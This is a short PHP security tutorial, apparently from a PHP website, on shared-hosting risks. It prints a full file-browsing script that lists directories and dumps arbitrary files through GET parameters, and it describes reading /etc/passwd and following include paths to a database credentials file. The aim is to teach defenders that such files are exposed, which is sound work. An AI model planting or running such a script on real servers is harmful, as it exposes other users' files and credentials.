In addition to being able to read arbitrary files on the shared server, the attacker can also create a script that can browse the file system. Since most of your sensitive files will not be stored in the main directory of your website, this type of script is generally used to find the location of your source files. Please see the following example:
<pre class="brush:php;toolbar:false"> <?php if (isset($_GET['dir'])) { ls($_GET['dir']); } elseif (isset($_GET['file'])) { cat($_GET['file']); } else { ls('/'); } function cat($file) { echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8')); } function ls($dir) { $handle = dir($dir); while ($filename = $handle->read()) { $size = filesize("$dir$filename"); if (is_dir("$dir$filename")) { $type = 'dir'; $filename .= '/'; } else { $type = 'file'; } if (is_readable("$dir$filename")) { $line = str_pad($size, 15); $line .= "<a href=\"{$_SERVER['PHP_SELF']}"; $line .= "?$type=$dir$filename\">$filename</a>"; } else { $line = str_pad($size, 15); $line .= $filename; } echo "$line\n"; } $handle->close(); } ?>
An attacker may first look at the /etc/passwd file or /home directory to obtain a list of usernames on the server; the location of source files stored outside the website's home directory can be discovered through language structures such as include or require. For example, consider the following script file /home/victim/public_html/admin.php:
<?php include '../inc/db.inc'; /* ... */ ?>
If an attacker manages to display the source code of the file, he can discover the location of db.inc and he can use the readfile() function to expose its contents and gain access to the database. Thus, saving db.inc outside the website's home directory does not protect it in this environment.
This attack illustrates why all source files on a shared server should be considered public and the database chosen to hold all sensitive data.
The above is the content of PHP security-file system browsing. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!